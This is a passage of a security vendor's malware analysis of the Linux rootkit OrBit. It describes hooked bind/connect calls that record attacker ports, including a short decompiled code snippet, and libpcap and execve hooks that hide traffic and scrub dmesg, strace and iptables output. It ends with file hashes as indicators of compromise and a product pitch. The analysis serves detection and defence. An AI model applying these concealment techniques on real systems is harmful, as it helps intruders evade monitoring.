<p>If <code><strong>bind</strong></code> or <code><strong>connect</strong></code> are called by a program launched by the malicious user, the port used is written to the <code><em>.ports</em></code> file previously created by the dropper.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>bind() - Retrieve the port involved in the attacker's connection</strong> 
if ( syscall(104) == 920366 ) // getgid()
{
    port = htons(serv_addr-&gt;sin_port);
    len = 25;
    for ( i = 0; len &gt; i; ++i )
        ports_file[i] = obfuscated_string[i] ^ 0xA2;
    ports_file[len] = 0;
    fd = syscall(2, ports_file, 1090, 420); // open
    len_buffer = <strong>sprintf</strong>(buffer, "%d\n", port);
    syscall(1, fd, buffer, len_buffer); // write()
    fsync(fd);
    syscall(3, fd); // close()
}</pre>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h4>libpcap</h4>
<p>The pcap library is used on unix systems to capture packets on a network interface, it is notably used in tools like <em><strong>wireshark</strong></em>, <em><strong>tcpdump</strong></em>, <em><strong>nmap</strong></em> etc... The goal of the malware is to remove packets containing ports from suspicious connections.</p>
<p>The <strong><code>pcap_loop</code></strong> function allows to start capturing packets on an interface and takes as argument a function, which will be called each time a packet is intercepted.</p>
<p>In its own implementation, the library saves the function passed as argument in the global variable <code><strong>orig_callback</strong></code> and calls <code><strong>pcap_loop</strong></code> with another function: <strong><code>pcap_packet_callback</code></strong>.</p>
<p>The header of each captured packet is analyzed to determine the protocol (TCP or UDP), in both cases, a function is called to check if the involved ports are found in the <em><code>.ports</code></em> or <code><em>.udp </em></code>files.</p>
<p>If no suspect ports are found, the original callback function is called.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="1024" height="446" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201024%20446'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 14" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-14-1024x446.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14-300x131.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14-768x334.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14-1536x669.png 1536w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14-1396x608.png 1396w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14-700x305.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14.png 1645w" data-lazy-sizes="(max-width: 1024px) 100vw, 1024px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-14-1024x446.png" /><noscript><img width="1024" height="446" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-14-1024x446.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 14" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-14-1024x446.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14-300x131.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14-768x334.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14-1536x669.png 1536w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14-1396x608.png 1396w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14-700x305.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-14.png 1645w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h3>execve</h3>
<p>The <code><strong>execve</strong></code> function aims to further disguise the malware from the eyes of a normal user by removing specific content or content in configuration files from certain commands:</p>
<ul>
<li><em><strong>dmesg</strong></em> is stripped of lines containing <code><em><strong>promiscuous</strong></em></code>, <code><em><strong>zapping</strong></em></code>, <code><em><strong>tcpdump</strong></em></code>, <code><em><strong>libntpVnQE6mk</strong></em></code> and <code><em><strong>libdl.so</strong></em></code>, as well as the contents of the <code><em>/lib/ibntpVnQE6mk/.sys/.dmesg</em></code> file.</li>
<li><strong>strace</strong> sis stripped of lines containing <code><em><strong>.l</strong></em></code>, <code><em><strong>920366</strong></em></code> and <code><em><strong>libntpVnQE6mk</strong></em></code>. Also, if the <em><strong>-o</strong></em> option is used, the output will be redirected to <code><em>/tmp/.orbit</em></code>.</li>
<li><em><strong>ip</strong></em> and <em><strong>iptables</strong></em> have their output compafred with the contents of <em><code>/lib/libntpVnQE6mk/.net</code></em> and <code><em>/lib/libntpVnQE6mk/.fw</em></code>, the lines are also removed in case of a match.</li>
</ul>
<p>If the variable <strong>LD_TRACE_LOADED_OBJECTS </strong>is present in the environment of the user running a program, the list of used dynamic libraries is displayed on the screen.</p>
<p>To stay hidden, the malware modifies the linker to use the backup present in its folder.</p>
<p>Finally, if the file <code><em>/lib/libntpVnQE6mk/.nolog</em></code> is present, each command executed will be written in <em><code>/lib/libntpVnQE6mk/execlog</code></em>.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h2>OrBit IoC<span style="font-size: 16px;"> </span></h2>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

<div class="qode-advanced-pricing-table">
	<div class="qode-apt-header qode-apt-row">
		<div class="qode-apt-title-holder">
			<h5 class="qode-apt-title">
							</h5>
		</div>
		<div class="qode-apt-column-title-holder">
			<h5 class="qode-apt-title">
				SHA-256			</h5>
		</div>
	</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				dropper			</div>
			<div class="qode-apt-item-price">
				$f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				libdl.so			</div>
			<div class="qode-apt-item-price">
				$40b5127c8cf9d6bec4dbeb61ba766a95c7b2d0cafafcb82ede5a3a679a3e3020			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				.boot.sh			</div>
			<div class="qode-apt-item-price">
				$e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				.profile			</div>
			<div class="qode-apt-item-price">
				$025e776c51b23e83fe4b400c527902d59dffa65cb35b4a163298790b1990b49c			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				escalator			</div>
			<div class="qode-apt-item-price">
				$d316e896ed4c9a737b2964e5aceaf25751383db13bd9cdcb346bb893eff7fc47			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				.l			</div>
			<div class="qode-apt-item-price">
				$fbe72ad884c4bf7b874794c0d6fe99054cf06c9d23ac004be3a36142bbcaa728			</div>
		</div>
			</div>	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h2>Stormshield protections against OrBit</h2>
<p>With the Stormshield Network Security solution, dedicated to network protection, <strong>the dropper and the OrBit library are detected and blocked thanks to the embedded antiviral engine, but also via the Breach Fighter cloud detonation option.</strong></p>

		</div> 
	</div> </div></div></div></div></div>
</section>                                </div>
                            </div>

                                                            <div class="single_tags clearfix">
                                    <div class="tags_text">
                                        <h5>Tags :</h5>
                                        <a href="https://www.stormshield.com/tag/cybersecurity-by-stormshield/" rel="tag">Cybersecurity - by Stormshield</a>                                    </div>
                                </div>
                            
                            <div class="vc_row wpb_row section vc_row-fluid  shareon grid_section" style=" text-align:center;">
                                <div class=" section_inner clearfix">
                                    <div class="section_inner_margin clearfix">
                                        <div class="wpb_column vc_column_container vc_col-sm-12">
                                            <div class="vc_column-inner ">
                                                <div class="wpb_wrapper">
                                                    <div class="wpb_text_column wpb_content_element ">
                                                        <div class="wpb_wrapper">
                                                            <p>Share on</p>

                                                        </div>
                                                    </div>
                                                    <div class="wpb_text_column wpb_content_element ">
                                                        <div class="wpb_wrapper">
                                                            [juiz_sps buttons="facebook, twitter, linkedin, mail"]                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                        </div>
                    </div>

                </div>

            </div>
        </div>


        

            <div class="vc_row wpb_row section vc_row-fluid " style=" text-align:left;">
                <div class=" full_section_inner clearfix">
                    <div class="wpb_column vc_column_container vc_col-sm-12">
                        <div class="vc_column-inner ">
                            <div class="wpb_wrapper">
                                <div class="call_to_action call_to_action_center normal stormshield">
                                    <div class="container_inner">

                                        <div class="call_to_action_text">Malicious code is designed to be less and less detectable by traditional protection systems. For this reason, Stormshield Network Security firewalls do not rely solely on a malware signature-based system but incorporate emulation mechanisms to proactively identify malicious code.</div>

                                        <a itemprop="url" href="https://www.stormshield.com/products-services/products/network-security/" class="qbutton white">Stormshield Network Security</a>

                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

        
        

            <div class="vc_row wpb_row section vc_row-fluid " style=" text-align:left;">
                <div class=" full_section_inner clearfix">
                    <div class="wpb_column vc_column_container vc_col-sm-12">
                        <div class="vc_column-inner ">
                            <div class="wpb_wrapper">
                                <div class="call_to_action call_to_action_center second stormshield">
                                    <div class="container_inner">

                                        <div class="call_to_action_text">With our Breach Fighter option, enhance the functionality of your Stormshield appliances with sandboxing and analysis of your suspicious files. Add dynamic protection against unknown attacks to your cybersecurity solutions.</div>

                                        <a itemprop="url" href="https://www.stormshield.com/products-services/products/network-security/product-range-sns/breach-figther-option/" class="qbutton white">Breach Fighter</a>

                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

        
    </div>

                <div class="about-author">
            <div class="full_width">
                <div class="full_width_inner">
                    <div class="vc_row wpb_row section vc_row-fluid grid_section">
                        <div class="section_inner clearfix">
                            <div class="section_inner_margin clearfix tab_product_title">
                                <div class="wpb_column vc_column_container vc_col-sm-6">
                                    <div class="vc_column-inner ">
                                        <div class="wpb_wrapper">
                                            <div class="wpb_text_column wpb_content_element ">
                                                <div class="wpb_wrapper">
                                                    <h3>About the author</h3>

                                                    <div class="author_description">
                                                        <div class="author_description_inner">
                                                            <div class="image">
                                                                <img alt='' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2075%2075'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/3a7027e3b880cbe655a3ff3d926d6613?s=150&#038;d=mm&#038;r=g 2x' class='avatar avatar-75 photo' height='75' width='75' decoding='async' data-lazy-src="https://secure.gravatar.com/avatar/3a7027e3b880cbe655a3ff3d926d6613?s=75&#038;d=mm&#038;r=g"/><noscript><img alt='' src='https://secure.gravatar.com/avatar/3a7027e3b880cbe655a3ff3d926d6613?s=75&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/3a7027e3b880cbe655a3ff3d926d6613?s=150&#038;d=mm&#038;r=g 2x' class='avatar avatar-75 photo' height='75' width='75' decoding='async'/></noscript>                                                            </div>
                                                            <div class="author_text_holder">
                                                                <h5 class="author_name vcard author">
													<span class="fu">
													Louis Deschanel													</span>
                                                                </h5>
                                                                <span class="author_email"></span>

                                                            </div>
                                                            <div class="author_content">
                                                                
                                                                
                                                            </div>

                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="wpb_column vc_column_container vc_col-sm-6">
                                    <div class="vc_column-inner ">
                                        <div class="wpb_wrapper">
                                            <div class="wpb_text_column wpb_content_element ">
                                                <div class="wpb_wrapper">
                                                    <h3>Last articles</h3>

                                                                                                            <article id="post-1408" class="author_post">
                                                            <h3 class="news-title"><a itemprop="url" href="https://www.stormshield.com/news/acridrain-stealer/">A walk through the AcridRain Stealer</a></h3>
                                                            <span class="news-date">28 08 2018</span>
                                                        </article>
                                                                                                            <article id="post-1323" class="author_post">
                                                            <h3 class="news-title"><a itemprop="url" href="https://www.stormshield.com/news/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/">In-depth Formbook malware analysis &#8211; Obfuscation and process injection</a></h3>
                                                            <span class="news-date">29 03 2018</span>
                                                        </article>
                                                                                                            <article id="post-1287" class="author_post">
                                                            <h3 class="news-title"><a itemprop="url" href="https://www.stormshield.com/news/de-obfuscating-jump-chains-with-binary-ninja/">De-obfuscating Jump Chains with Binary Ninja</a></h3>
                                                            <span class="news-date">20 03 2018</span>
                                                        </article>
                                                                                                                                                            
                                                    <p class="news-author-more"><a href="https://www.stormshield.com/category/thisissecurity/">See all articles from Technical posts <i class="fa fa-arrow-right" aria-hidden="true"></i></a></p>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>


                


                <div class="page-template-news">
            <div class="full_width">
                <div class="full_width_inner">
                    <div class="container">
                        <div class="container_inner default_template_holder clearfix page_container_inner">

                            <h2 style="text-align: center;">Read more</h2>

                            <div class="blog_holder blog_pinterest masonry_load_more">

                                <div class="blog_holder_grid_sizer"></div>
                                <div class="blog_holder_grid_gutter"></div>

                                                                                                        <article id="post-385002" class="post-385002 post type-post status-publish format-standard has-post-thumbnail hentry category-alert tag-cybersecurity-by-stormshield" style="background: url('https://www.stormshield.com/wp-content/uploads/shutterstock-1050436496-800x600.jpg') repeat top left, transparent url('https://www.stormshield.com/wp-content/uploads/shutterstock-1050436496-800x600.jpg') no-repeat left center; background-size: cover;">
                                        <div class="news_cat">
                                            <a href="https://www.stormshield.com/category/alert/" rel="category tag">Alert</a>                                        </div>
                                        <a itemprop="url" href="https://www.stormshield.com/news/security-alert-skulllocker-ransomware-stormshield-products-response/">
                                            <div class="news-block">
                                                <div class="news-block-info">
                                                    <span class="news-date">15 03 2023</span>
                                                    <h3 class="news-title">SkullLocker Security Alert: Stormshield Products Response</h3>
                                                </div>
                                            </div>
                                        </a>
                                    </article>
                                                                                                        <article id="post-384989" class="post-384989 post type-post status-publish format-standard has-post-thumbnail hentry category-opinion-articles tag-cybersecurity-by-stormshield" style="background: url('https://www.stormshield.com/wp-content/uploads/shutterstock-1322690150-800x600.jpg') repeat top left, transparent url('https://www.stormshield.com/wp-content/uploads/shutterstock-1322690150-800x600.jpg') no-repeat left center; background-size: cover;">
                                        <div class="news_cat">
                                            <a href="https://www.stormshield.com/category/opinion-articles/" rel="category tag">Opinion articles</a>                                        </div>
                                        <a itemprop="url" href="https://www.stormshield.com/news/corporate-use-of-enhanced-cybersecurity-products-the-way-of-the-future/">
                                            <div class="news-block">
                                                <div class="news-block-info">
                                                    <span class="news-date">13 03 2023</span>
                                                    <h3 class="news-title">Corporate use of hardened cybersecurity products: the way of the future?</h3>
                                                </div>
                                            </div>
                                        </a>
                                    </article>
                                                                                                        <article id="post-373147" class="post-373147 post type-post status-publish format-standard has-post-thumbnail hentry category-opinion-articles tag-cybersecurity-by-stormshield" style="background: url('https://www.stormshield.com/wp-content/uploads/shutterstock-2232301231-800x600.jpg') repeat top left, transparent url('https://www.stormshield.com/wp-content/uploads/shutterstock-2232301231-800x600.jpg') no-repeat left center; background-size: cover;">
                                        <div class="news_cat">
                                            <a href="https://www.stormshield.com/category/opinion-articles/" rel="category tag">Opinion articles</a>                                        </div>
                                        <a itemprop="url" href="https://www.stormshield.com/news/what-challenges-does-cybersecurity-face-in-2023/">
                                            <div class="news-block">
                                                <div class="news-block-info">
                                                    <span class="news-date">06 02 2023</span>
                                                    <h3 class="news-title">What challenges does cybersecurity face in 2023?</h3>
                                                </div>
                                            </div>
                                        </a>
                                    </article>
                                                            </div>
                                                                                </div>
                    </div>
                </div>
            </div>
        </div>
    
<div class="progress">
    <div class="progressactive"></div>
</div>


		
	</div>
</div>



	<footer >
		<div class="footer_inner clearfix">
				<div class="footer_top_holder">
            			<div class="footer_top">
								<div class="container">
					<div class="container_inner">
																	<div class="three_columns clearfix">
								<div class="column1 footer_col1">
									<div class="column_inner">
										<div id="nav_menu-14" class="widget widget_nav_menu"><div class="menu-menu-footer-produits-en-container"><ul id="menu-menu-footer-produits-en" class="menu"><li id="menu-item-26572" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-26572"><a href="https://www.stormshield.com/products-services/products/">Products</a>
<ul class="sub-menu">
	<li id="menu-item-233119" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-233119"><a href="https://www.stormshield.com/products-services/products/network-security/product-range-sns/">Stormshield Network Security</a></li>
	<li id="menu-item-233118" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-233118"><a href="https://www.stormshield.com/products-services/products/endpoint-protection/stormshield-endpoint-security/">Stormshield Endpoint Security</a></li>
	<li id="menu-item-316131" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-316131"><a href="https://www.stormshield.com/products-services/products/data-protection/sds-range/">Stormshield Data Security</a></li>
	<li id="menu-item-364633" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-364633"><a href="https://www.stormshield.com/products-services/products/network-security/administration-tools-sns-firewalls/sls-stormshield-log-supervisor/">Stormshield Log Supervisor</a></li>
	<li id="menu-item-364643" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-364643"><a href="https://www.stormshield.com/products-services/products/network-security/administration-tools-sns-firewalls/stormshield-management-center/">Stormshield Management Center</a></li>
	<li id="menu-item-282226" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-282226"><a href="https://www.stormshield.com/resource-center/?_sft_rc_type=datasheet">Datasheets</a></li>
	<li id="menu-item-282227" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-282227"><a href="https://www.stormshield.com/resource-center/?_sft_rc_type=case-studies">Customer cases</a></li>
	<li id="menu-item-235890" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-235890"><a href="https://advisories.stormshield.eu/">Advisories Stormshield</a></li>
</ul>
</li>
</ul></div></div><div id="nav_menu-13" class="widget widget_nav_menu"><div class="menu-menu-footer-partenaires-en-container"><ul id="menu-menu-footer-partenaires-en" class="menu"><li id="menu-item-26577" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-26577"><a href="https://www.stormshield.com/partner/">Partner network</a>
<ul class="sub-menu">
	<li id="menu-item-26576" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-26576"><a href="https://www.stormshield.com/partner/partner-finder/">Partner finder</a></li>
	<li id="menu-item-26575" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-26575"><a href="https://www.stormshield.com/partner/apply-for-a-partnership/">Apply for a partnership</a></li>
	<li id="menu-item-282228" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-282228"><a href="https://mystormshield.eu/">MyStormshield</a></li>
</ul>
</li>
</ul></div></div>									</div>
								</div>
								<div class="column2 footer_col2">
									<div class="column_inner">
										<div id="nav_menu-12" class="widget widget_nav_menu"><div class="menu-menu-footer-services-en-container"><ul id="menu-menu-footer-services-en" class="menu"><li id="menu-item-26579" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-26579"><a href="https://www.stormshield.com/our-support/services/">Services</a>
<ul class="sub-menu">
	<li id="menu-item-26582" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-26582"><a href="https://www.stormshield.com/our-support/services/technical-support/">Technical Support</a></li>
	<li id="menu-item-233088" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-233088"><a href="https://www.stormshield.com/our-support/services/professional-services/">Professional Services</a></li>
	<li id="menu-item-232798" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-232798"><a href="https://www.stormshield.com/our-support/services/training/training-calendar/">Training calendar</a></li>
	<li id="menu-item-309533" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-309533"><a href="https://www.stormshield.com/our-support/services/cyber-threat-intelligence/">Threat Intelligence</a></li>
	<li id="menu-item-377146" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-377146"><a href="https://www.stormshield.com/our-support/services/stormshield-academy/">Stormshield Academy</a></li>
	<li id="menu-item-384880" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-384880"><a href="https://documentation.stormshield.eu/">Technical Documentation</a></li>
	<li id="menu-item-232848" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-232848"><a href="https://www.stormshield.com/resource-center/">Marketing documentation</a></li>
	<li id="menu-item-282229" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-282229"><a href="https://security.stormshield.eu/">Security Portal</a></li>
</ul>
</li>
</ul></div></div><div id="nav_menu-11" class="widget widget_nav_menu"><div class="menu-menu-footer-a-propos-en-container"><ul id="menu-menu-footer-a-propos-en" class="menu"><li id="menu-item-26565" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-26565"><a href="https://www.stormshield.com/about-us/">About us</a>
<ul class="sub-menu">
	<li id="menu-item-235892" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-235892"><a href="https://www.stormshield.com/about-us/">Teams</a></li>
	<li id="menu-item-381072" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-381072"><a href="https://stories.stormshield.com/en/">Backstage</a></li>
	<li id="menu-item-26566" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-26566"><a href="https://www.stormshield.com/news/">News</a></li>
	<li id="menu-item-117833" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-117833"><a href="https://www.stormshield.com/our-websites/">Websites</a></li>
</ul>
</li>
</ul></div></div>									</div>
								</div>
								<div class="column3 footer_col3">
									<div class="column_inner">
										<div id="text-28" class="widget widget_text"><h5>Sales team</h5>			<div class="textwidget"><p>+33 (0)9 69 32 96 29</p>
</div>
		</div><div id="text-18" class="widget widget_text">			<div class="textwidget"><p><a href="https://www.stormshield.com/contact/sales-enquiry/" class="qbutton blue">Send us your request</a></p>
</div>
		</div><div id="text-23" class="widget widget_text"><h5>Follow us</h5>			<div class="textwidget"></div>
		</div><span class='q_social_icon_holder normal_social' data-color=#ffffff data-hover-color=#0ab2e8><a itemprop='url' href='https://twitter.com/Stormshield' target='_blank'><i class="qode_icon_font_awesome fa fa-twitter  simple_social" style="color: #ffffff;font-size: 18px;" ></i></a></span><span class='q_social_icon_holder normal_social' data-color=#ffffff data-hover-color=#0ab2e8><a itemprop='url' href='https://www.linkedin.com/company/stormshield/' target='_blank'><i class="qode_icon_font_awesome fa fa-linkedin  simple_social" style="color: #ffffff;font-size: 18px;" ></i></a></span><span class='q_social_icon_holder normal_social' data-color=#ffffff data-hover-color=#0ab2e8><a itemprop='url' href='https://www.youtube.com/c/StormshieldOfficial' target='_blank'><i class="qode_icon_font_awesome fa fa-youtube  simple_social" style="color: #ffffff;font-size: 18px;" ></i></a></span>									</div>
								</div>
							</div>
															</div>
				</div>
							</div>
					</div>
							<div class="footer_bottom_holder">
                								<div class="container">
					<div class="container_inner">
										<div class="two_columns_50_50 footer_bottom_columns clearfix">
					<div class="column1 footer_bottom_column">
						<div class="column_inner">
							<div class="footer_bottom">
											<div class="textwidget"><p><a href="https://www.stormshield.com/"><img decoding="async" style="width: 110px;" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E" data-lazy-src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png" /><noscript><img decoding="async" style="width: 110px;" src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png" /></noscript></a></p>
</div>
									</div>
						</div>
					</div>
					<div class="column2 footer_bottom_column">
						<div class="column_inner">
							<div class="footer_bottom">
								<div class="menu-menu_mentionslegales-container"><ul id="menu-menu_mentionslegales" class="menu"><li id="menu-item-202" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-202"><a href="https://www.stormshield.com/legal-notice/">Legal notice</a></li>
<li id="menu-item-80423" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-80423"><a href="https://www.stormshield.com/standard-terms-conditions-sale-service/">Standard Terms and Conditions of Sale and Service</a></li>
<li id="menu-item-117834" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-117834"><a href="https://www.stormshield.com/personal-data/">Personal data</a></li>
</ul></div>							</div>
						</div>
					</div>
				</div>
											</div>
			</div>
						</div>
				</div>
	</footer>
		
</div>
</div>
<script type="text/javascript">
function blockClickCheckbox(){
    var limit = 5;
    jQuery('input.product_compare').on('change', function(evt) {
        if(jQuery("input.product_compare:checked").length >= limit) {
            this.checked = false;
        }
        if (jQuery(this).is(':checked')){
            if (typeof values == 'undefined')
                values = new Array(this.value);
            else
                values.push(this.value);
        }
        else if (jQuery("input.product_compare:checked").length < 4){
            index = values.indexOf(this.value);
            values.splice(index, 1);
        }
    });
}

function menu_fixed_content_li(){
    //arrayDiv = ["#product_avantages", "#product_spec_techniques","#product_ressources_center", "#product_certifications", "#product_maintenance", "#product_support_tech", "#product_formation", "#product_moreinfo" ];
    //arrayName = ["Overview", "Technical specifications", "Resource Center", "Certifications", "Maintenance", "Support", "Training", "More"];

    arrayDiv = ["#product_spec_techniques","#product_ressources_center", "#product_certifications", "#product_maintenance", "#product_support_tech", "#product_formation", "#product_moreinfo" ];
    arrayName = ["Technical specifications", "Resource Center", "Certifications", "Maintenance", "Support", "Training", "More"];

    indice = 0;
    jQuery.each(arrayDiv, function(key, value){
        if(jQuery("div[data-q_id='" + value + "']").length){
            jQuery("nav.content_menu ul.menu").append('<li> <a href="' + value + '"><span>' + arrayName[indice] + '</span></a></li>')
        };
        indice++;
    });
}

function contentMenuScrollTo_OverrideShokola(){
    "use strict";

    if($j('nav.content_menu').length){

        $j("nav.content_menu ul.menu li a").on('click', function(e){
            e.preventDefault();
            var $this = $j(this);

            if($j(this).parent().hasClass('active')){
                return false;
            }

            var $target = $this.attr("href");
            var targetOffset = $j("div.wpb_row[data-q_id='" + $target + "'],section.parallax_section_holder[data-q_id='" + $target + "']").offset().top - content_line_height;
            $j('html,body').stop().animate({scrollTop: targetOffset }, 500, 'swing', function(){
                $j('nav.content_menu ul li').removeClass('active');
                $this.parent().addClass('active');
            });

            return false;
        });

    }
}
</script>
		<script>
			window.RS_MODULES = window.RS_MODULES || {};
			window.RS_MODULES.modules = window.RS_MODULES.modules || {};
			window.RS_MODULES.waiting = window.RS_MODULES.waiting || [];
			window.RS_MODULES.defered = false;
			window.RS_MODULES.moduleWaiting = window.RS_MODULES.moduleWaiting || {};
			window.RS_MODULES.type = 'compiled';
		</script>
		
    <!-- Google Tag Manager (noscript) -->
    <noscript>
        <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TDS34XC"
                height="0" width="0" style="display:none;visibility:hidden"></iframe>
    </noscript>
    <!-- End Google Tag Manager (noscript) -->
    <script type="text/html" id="wpb-modifications"></script><link data-minify="1" rel='stylesheet' id='whp1893tw-bs4.css-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/wp-security-hardening/modules/inc/assets/css/tw-bs4.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='whp4477font-awesome.min.css-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/wp-security-hardening/modules/inc/fa/css/font-awesome.min.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='whp9177front.css-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/wp-security-hardening/modules/css/front.css?ver=1677083147' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='rs-plugin-settings-css' href='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=1677083147' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
#rs-demo-id {}
</style>
